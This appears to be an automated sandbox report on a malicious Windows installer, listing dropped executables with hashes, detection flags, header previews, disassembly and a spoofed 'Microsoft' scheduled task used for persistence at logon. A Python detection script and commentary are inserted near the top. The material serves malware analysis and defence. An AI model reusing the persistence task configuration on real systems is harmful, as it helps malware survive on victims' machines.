                                        SSDEEP:48:dXKLzDlnbL6w0QldOVQOj933ODOiTdKbKsz72eW+5y4:dXazDlnKwhldOVQOj6dKbKsz7
                                        MD5:7F252B19B6E96247184F55570325E9FA
                                        SHA1:E6D4AD432CB4864C0E1A08FB15255F7973807B3D
                                        SHA-256:84460DE817C9A6637650C7ED83D15DD14836FB841FF9790D4F2D1A8D6BAAB0ED
                                        SHA-512:A5741E4F5095BB24A28E5909CC659CB53535BD1E7A2555FA9D2660155F8CA80F96136E2CA589CCD2154FCF264B8FD525782B8C9752022B986F20D3F1454496EF
                                        Malicious:false
                                        Preview:<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2005-10-11T13:21:17-08:00</Date>. <Author>Microsoft Corporation</Author>. <Version>1.0.0</Version>. <Description>Microsoft</Description>. <URI>\kafanbbs</URI>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user</UserId>. </LogonTrigger>. </Triggers>. <Principals>. <Principal id="System">. <UserId>user</UserId>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvai
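The preview above is the persistence mechanism in plain sight: a Task Scheduler XML document whose RegistrationInfo claims "Microsoft Corporation" as author but registers the task as \kafanbbs at the root of the task namespace rather than under \Microsoft\, fires on a LogonTrigger, runs with RunLevel HighestAvailable, and switches off the settings that would let Windows stop it (AllowHardTerminate, StopIfGoingOnBatteries, DisallowStartIfOnBatteries all false). The Python below is an added example, not code from the report: it parses a task XML with the standard library and returns those findings. The sample task is constructed from the elements visible in the preview; everything after StartWhenAvailable, including the Exec action and its placeholder path, is assumed because the preview is cut off there, and the benign second sample is entirely made up.

```python
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
USER_WRITABLE = ("\\users\\", "\\appdata\\", "\\temp\\", "\\programdata\\", "\\public\\")

# Constructed from the \kafanbbs preview above; elements after <StartWhenAvailable>
# and the whole <Actions> block (placeholder path) are assumptions, not report data.
SAMPLE_TASK = r"""<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <Date>2005-10-11T13:21:17-08:00</Date>
    <Author>Microsoft Corporation</Author>
    <Version>1.0.0</Version>
    <Description>Microsoft</Description>
    <URI>\kafanbbs</URI>
  </RegistrationInfo>
  <Triggers>
    <LogonTrigger>
      <Enabled>true</Enabled>
      <UserId>user</UserId>
    </LogonTrigger>
  </Triggers>
  <Principals>
    <Principal id="System">
      <UserId>user</UserId>
      <RunLevel>HighestAvailable</RunLevel>
    </Principal>
  </Principals>
  <Settings>
    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>
    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
    <AllowHardTerminate>false</AllowHardTerminate>
    <StartWhenAvailable>true</StartWhenAvailable>
  </Settings>
  <Actions>
    <Exec>
      <Command>C:\Users\user\AppData\Roaming\placeholder.exe</Command>
    </Exec>
  </Actions>
</Task>
"""

# Entirely constructed control case in the shape of a stock Microsoft task.
BENIGN_TASK = r"""<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <Author>Microsoft Corporation</Author>
    <URI>\Microsoft\Windows\Example\Constructed</URI>
  </RegistrationInfo>
  <Triggers><CalendarTrigger><Enabled>true</Enabled></CalendarTrigger></Triggers>
  <Principals><Principal id="Author"><RunLevel>LeastPrivilege</RunLevel></Principal></Principals>
  <Settings><AllowHardTerminate>true</AllowHardTerminate></Settings>
  <Actions><Exec><Command>C:\Windows\System32\constructed.exe</Command></Exec></Actions>
</Task>
"""


def triage_task(xml_text):
    """Return the findings an analyst would raise for one Task Scheduler XML document."""
    root = ET.fromstring(xml_text)

    def text(path):
        el = root.find(path, NS)
        return (el.text or "").strip() if el is not None else ""

    findings = []
    author = text("t:RegistrationInfo/t:Author")
    uri = text("t:RegistrationInfo/t:URI")
    # Microsoft's own tasks live under \Microsoft\; a Microsoft author elsewhere is spoofing.
    if "microsoft" in author.lower() and not uri.lower().startswith("\\microsoft\\"):
        findings.append("author '%s' claims Microsoft but URI '%s' is outside \\Microsoft\\" % (author, uri))
    if root.find("t:Triggers/t:LogonTrigger", NS) is not None:
        findings.append("LogonTrigger: re-runs at every logon (persistence)")
    if text("t:Principals/t:Principal/t:RunLevel") == "HighestAvailable":
        findings.append("RunLevel HighestAvailable: full (admin) token when the user is an administrator")
    weakened = [name for name in ("AllowHardTerminate", "StopIfGoingOnBatteries", "DisallowStartIfOnBatteries")
                if text("t:Settings/t:" + name) == "false"]
    if weakened:
        findings.append("settings set to false: " + ", ".join(weakened))
    for cmd in root.findall("t:Actions/t:Exec/t:Command", NS):
        path = (cmd.text or "").strip().strip('"').lower()
        if any(marker in path for marker in USER_WRITABLE):
            findings.append("Exec command in a user-writable location: " + path)
    return findings


if __name__ == "__main__":
    for finding in triage_task(SAMPLE_TASK):
        print("-", finding)
    print("benign control:", triage_task(BENIGN_TASK))
```

On a live host the same function can be pointed at the files under C:\Windows\System32\Tasks\ (each task is stored as one such XML document), which also catches tasks whose on-disk XML was written directly rather than through schtasks.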
                                        Process:C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp
                                        File Type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
                                        Category:dropped
                                        Size (bytes):5649408
                                        Entropy (8bit):6.392614480390128
                                        Encrypted:false
                                        SSDEEP:98304:jgRfP5jnFTyGZEWxSIBHVGT+t1ufqchZ:kRZDFTyGaHIJoWofqc
                                        MD5:8C71B86BF407C05BAF11E8D296B9C8B8
                                        SHA1:6624AB8CA883C48F02C58250D4EEE9E90098F4E4
                                        SHA-256:BE2099C214F63A3CB4954B09A0BECD6E2E34660B886D4C898D260FEBFE9D70C2
                                        SHA-512:BB3FEE727E40F8213F0A7D9808048E341295A684ECBA6F4DF52F1B07B528D7206CA41926B2433F4B63451565AD2854570FEE976BC7051B629ACD24FCA6D0F507
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................&.ZF..0V..<.............@..............................V.....L.V...`... ...............................................V../...........0O..............`V.\a...........................vL.(.....................V..............................text....XF......ZF.................`..`.data....z...pF..|...^F.............@....rdata.. 9....F..:....F.............@..@.pdata.......0O.......O.............@..@.xdata........Q.......Q.............@..@.bss.....;....U..........................idata.../....V..0....U.............@....CRT....h....@V.......U.............@....tls.........PV.......U.............@....reloc..\a...`V..b....U.............@..B................................................................................................................................................................................................................
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):64
                                        Entropy (8bit):1.1940658735648508
                                        Encrypted:false
                                        SSDEEP:3:Nlllultnxj:NllU
                                        MD5:F93358E626551B46E6ED5A0A9D29BD51
                                        SHA1:9AECA90CCBFD1BEC2649D66DF8EBE64C13BACF03
                                        SHA-256:0347D1DE5FEA380ADFD61737ECD6068CB69FC466AC9C77F3056275D5FCAFDC0D
                                        SHA-512:D609B72F20BF726FD14D3F2EE91CCFB2A281FAD6BC88C083BFF7FCD177D2E59613E7E4E086DB73037E2B0B8702007C8F7524259D109AF64942F3E60BFCC49853
                                        Malicious:false
                                        Preview:@...e................................................@..........
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp
                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                        Category:dropped
                                        Size (bytes):6144
                                        Entropy (8bit):4.720366600008286
                                        Encrypted:false
                                        SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                        MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                        SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                        SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                        SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                        Malicious:false
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Users\user\AppData\Local\Temp\is-940M1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp
                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):3598848
                                        Entropy (8bit):7.004949099807939
                                        Encrypted:false
                                        SSDEEP:49152:OLI2LSDJWhsk/42oQ6C+NkdkcQdhjee71MzuiehWIKxZUQjOlwz+cxtVI8q29Zlc:OLVLAJG42oaPQdhCe71MzSRsyo29Al
                                        MD5:1D1464C73252978A58AC925ECE57F0FB
                                        SHA1:30E442BE965F96F3EB75A3ABDB61B90E5A506993
                                        SHA-256:05184064FB017025E0704D75D199BAE02EBBD30AE4D76FB237DF9596CE6450AA
                                        SHA-512:40165B34D6BC63472C3874AAC1FB25B19880F5DFE662F672181728732DC80503A64EF4A8058A410755A321D6BDB7314387464DD8243D6E912F37D5032177928A
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 11%
                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....gg...........!.....b..........%........................................p7...........@.........................HC.......J..<.... 7.X....................07.8?..........................x........................K...............................text...`a.......b.................. ..`.rdata..<............f..............@..@.data................\..............@....00cfg.......`(.......(.............@..@.tls.........p(.......(.............@....voltbl.F.....(...... (..................=~ .........(......"(............. ..`.rsrc...X.... 7.......6.............@..@.reloc..8?...07..@....6.............@..B................................................................................................................................................................................................................................................................................
                                        Process:C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp
                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                        Category:dropped
                                        Size (bytes):6144
                                        Entropy (8bit):4.720366600008286
                                        Encrypted:false
                                        SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                        MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                        SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                        SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                        SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                        Malicious:false
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Users\user\AppData\Local\Temp\is-FCSH1.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp
                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):3598848
                                        Entropy (8bit):7.004949099807939
                                        Encrypted:false
                                        SSDEEP:49152:OLI2LSDJWhsk/42oQ6C+NkdkcQdhjee71MzuiehWIKxZUQjOlwz+cxtVI8q29Zlc:OLVLAJG42oaPQdhCe71MzSRsyo29Al
                                        MD5:1D1464C73252978A58AC925ECE57F0FB
                                        SHA1:30E442BE965F96F3EB75A3ABDB61B90E5A506993
                                        SHA-256:05184064FB017025E0704D75D199BAE02EBBD30AE4D76FB237DF9596CE6450AA
                                        SHA-512:40165B34D6BC63472C3874AAC1FB25B19880F5DFE662F672181728732DC80503A64EF4A8058A410755A321D6BDB7314387464DD8243D6E912F37D5032177928A
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 11%
                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....gg...........!.....b..........%........................................p7...........@.........................HC.......J..<.... 7.X....................07.8?..........................x........................K...............................text...`a.......b.................. ..`.rdata..<............f..............@..@.data................\..............@....00cfg.......`(.......(.............@..@.tls.........p(.......(.............@....voltbl.F.....(...... (..................=~ .........(......"(............. ..`.rsrc...X.... 7.......6.............@..@.reloc..8?...07..@....6.............@..B................................................................................................................................................................................................................................................................................
                                        Process:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):3366912
                                        Entropy (8bit):6.530548291878271
                                        Encrypted:false
                                        SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                                        MD5:9902FA6D39184B87AED7D94A037912D8
                                        SHA1:F5D8470ACF5DFF81C6D3364A8943B24E3DB48D95
                                        SHA-256:43D9F1FA3BDA81C618CC23FBB4E9D8551305AF0090A3D452C4070F938F6BCFAC
                                        SHA-512:BC97E2C379C464F821AF0E38630DB65165F4E91A1105A3C7DABCC5E61CC9EAAB1522AC82E749AA4FEFC5A9E21A295A0A59CFE99D6BC3980F9C89F00AF5B8CF75
                                        Malicious:true
                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                                        Process:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):3366912
                                        Entropy (8bit):6.530548291878271
                                        Encrypted:false
                                        SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                                        MD5:9902FA6D39184B87AED7D94A037912D8
                                        SHA1:F5D8470ACF5DFF81C6D3364A8943B24E3DB48D95
                                        SHA-256:43D9F1FA3BDA81C618CC23FBB4E9D8551305AF0090A3D452C4070F938F6BCFAC
                                        SHA-512:BC97E2C379C464F821AF0E38630DB65165F4E91A1105A3C7DABCC5E61CC9EAAB1522AC82E749AA4FEFC5A9E21A295A0A59CFE99D6BC3980F9C89F00AF5B8CF75
                                        Malicious:true
                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                                        Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                        File Type:ASCII text, with CRLF, CR line terminators
                                        Category:dropped
                                        Size (bytes):406
                                        Entropy (8bit):5.117520345541057
                                        Encrypted:false
                                        SSDEEP:6:AMpUMcvtFHcAxXF2SaioBGWOSTIPAiTVHsCgN/J2+ebVcdsvUGrFfpap1tNSK6n:pCXVZRwXkWDThGHs/JldsvhJA1tNS9n
                                        MD5:9200058492BCA8F9D88B4877F842C148
                                        SHA1:EED69748A26CFAF769EF589F395A162E87005B36
                                        SHA-256:BAFB8C87BCB80E77FF659D7B8152145866D8BD67D202624515721CBF38BA8745
                                        SHA-512:312AB0CBA3151B3CE424198C0855EEE39CC06FC8271E3D49134F00D7E09407964F31D3107169479CE4F8FD85D20BBD3F5309D3052849021954CD46A0B723F2A9
                                        Malicious:false
                                        Preview:..7-Zip (a) 23.01 (x86) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20....Scanning the drive for archives:.. 0M Scan. .1 file, 31890 bytes (32 KiB)....Extracting archive: locale3.dat..--..Path = locale3.dat..Type = 7z..Physical Size = 31890..Headers Size = 354..Method = LZMA2:16 LZMA:16 BCJ2 7zAES..Solid = -..Blocks = 1.... 0%. .Everything is Ok....Size: 63640..Compressed: 31890..
                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Entropy (8bit):7.921128632410474
                                        TrID:
                                        • Win32 Executable (generic) a (10002005/4) 98.04%
                                        • Inno Setup installer (109748/4) 1.08%
                                        • InstallShield setup (43055/19) 0.42%
                                        • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                                        • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                        File name:#U5b89#U88c5#U52a9#U624b_2.0.4.exe
                                        File size:5'707'417 bytes
                                        MD5:a32b45411fdacb8dc364e2ecc75f7c54
                                        SHA1:a1d3298f2e0ec913d269c8e393ddf49f6cd8fdbc
                                        SHA256:1f20c061d4c41e3e775e80d6aabf5f23d88fbf25923f5821e81b824ef1d1ee46
                                        SHA512:9f353857e6e8871c236c1f04f9f2285aa50a9b697da2c2adcd7a9f1bf6fcd7dcaffdcb111333432366eb709b10ee7108cfaf354c89d203a53d768268e393f195
                                        SSDEEP:98304:XwREri0dWV2OQavkTsvav3PlP4mJ3EANJhSzkYDKjgJdMwZgf:lvdEzQavkTsvafPlAmJ31DSIYCIs
                                        TLSH:1A461213F2CBE43EE0590B3B05B3A15494FB6A11A523AE5696ECB4ECCF311601E3E657
                                        File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                        Icon Hash:0c0c2d33ceec80aa
                                        Entrypoint:0x4a83bc
                                        Entrypoint Section:.itext
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                        Time Stamp:0x6690DABD [Fri Jul 12 07:26:53 2024 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:6
                                        OS Version Minor:1
                                        File Version Major:6
                                        File Version Minor:1
                                        Subsystem Version Major:6
                                        Subsystem Version Minor:1
                                        Import Hash:40ab50289f7ef5fae60801f88d4541fc
                                        Instruction
                                        push ebp
                                        mov ebp, esp
                                        add esp, FFFFFFA4h
                                        push ebx
                                        push esi
                                        push edi
                                        xor eax, eax
                                        mov dword ptr [ebp-3Ch], eax
                                        mov dword ptr [ebp-40h], eax
                                        mov dword ptr [ebp-5Ch], eax
                                        mov dword ptr [ebp-30h], eax
                                        mov dword ptr [ebp-38h], eax
                                        mov dword ptr [ebp-34h], eax
                                        mov dword ptr [ebp-2Ch], eax
                                        mov dword ptr [ebp-28h], eax
                                        mov dword ptr [ebp-14h], eax
                                        mov eax, 004A2EBCh
                                        call 00007FBE5CF59D85h
                                        xor eax, eax
                                        push ebp
                                        push 004A8AC1h
                                        push dword ptr fs:[eax]
                                        mov dword ptr fs:[eax], esp
                                        xor edx, edx
                                        push ebp
                                        push 004A8A7Bh
                                        push dword ptr fs:[edx]
                                        mov dword ptr fs:[edx], esp
                                        mov eax, dword ptr [004B0634h]
                                        call 00007FBE5CFEB70Bh
                                        call 00007FBE5CFEB25Eh
                                        lea edx, dword ptr [ebp-14h]
                                        xor eax, eax
                                        call 00007FBE5CFE5F38h
                                        mov edx, dword ptr [ebp-14h]
                                        mov eax, 004B41F4h
                                        call 00007FBE5CF53E33h
                                        push 00000002h
                                        push 00000000h
                                        push 00000001h
                                        mov ecx, dword ptr [004B41F4h]
                                        mov dl, 01h
                                        mov eax, dword ptr [0049CD14h]
                                        call 00007FBE5CFE7263h
                                        mov dword ptr [004B41F8h], eax
                                        xor edx, edx
                                        push ebp
                                        push 004A8A27h
                                        push dword ptr fs:[edx]
                                        mov dword ptr fs:[edx], esp
                                        call 00007FBE5CFEB793h
                                        mov dword ptr [004B4200h], eax
                                        mov eax, dword ptr [004B4200h]
                                        cmp dword ptr [eax+0Ch], 01h
                                        jne 00007FBE5CFF247Ah
                                        mov eax, dword ptr [004B4200h]
                                        mov edx, 00000028h
                                        call 00007FBE5CFE7B58h
                                        mov edx, dword ptr [004B4200h]
                                        Name | Virtual Address | Virtual Size | Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT | 0xb7000 | 0x71 | .edata
                                        IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb5000 | 0xfec | .idata
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xcb000 | 0x11000 | .rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xba000 | 0x10fa8 | .reloc
                                        IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_TLS | 0xb9000 | 0x18 | .rdata
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_IAT | 0xb52d4 | 0x25c | .idata
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0xb6000 | 0x1a4 | .didata
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                        Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                        .text | 0x1000 | 0xa568c | 0xa5800 | b889d302f6fc48a904de33d8d947ae80 | False | 0.3620185045317221 | data | 6.377190161826806 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                        .itext | 0xa7000 | 0x1b64 | 0x1c00 | 588dd0a8ab499300d3701cbd11b017d9 | False | 0.548828125 | data | 6.109264411030635 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                        .data | 0xa9000 | 0x3838 | 0x3a00 | 5c0c76e77aef52ebc6702430837ccb6e | False | 0.35338092672413796 | data | 4.95916338709992 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .bss | 0xad000 | 0x7258 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .idata | 0xb5000 | 0xfec | 0x1000 | 627340dff539ef99048969aa4824fb2d | False | 0.380615234375 | data | 5.020404933181373 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .didata | 0xb6000 | 0x1a4 | 0x200 | fd11c1109737963cc6cb7258063abfd6 | False | 0.34765625 | data | 2.729290535217263 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .edata | 0xb7000 | 0x71 | 0x200 | 7de8ca0c7a61668a728fd3a88dc0942d | False | 0.1796875 | data | 1.305578535725827 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .tls | 0xb8000 | 0x18 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .rdata | 0xb9000 | 0x5d | 0x200 | d84006640084dc9f74a07c2ff9c7d656 | False | 0.189453125 | data | 1.3892750148744617 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .reloc | 0xba000 | 0x10fa8 | 0x11000 | a85fda2741bd9417695daa5fc5a9d7a5 | False | 0.5789579503676471 | data | 6.709466460182023 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                        .rsrc | 0xcb000 | 0x11000 | 0x11000 | 5c24f1fdca2aa99f72cdacc12e9a194f | False | 0.18787339154411764 | data | 3.721333192760738 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                        RT_ICON | 0xcb678 | 0xa68 | Device independent bitmap graphic, 64 x 128 x 4, image size 2048 | English | United States | 0.1174924924924925
                                        RT_ICON | 0xcc0e0 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | United States | 0.15792682926829268
                                        RT_ICON | 0xcc748 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States | 0.23387096774193547
                                        RT_ICON | 0xcca30 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States | 0.39864864864864863
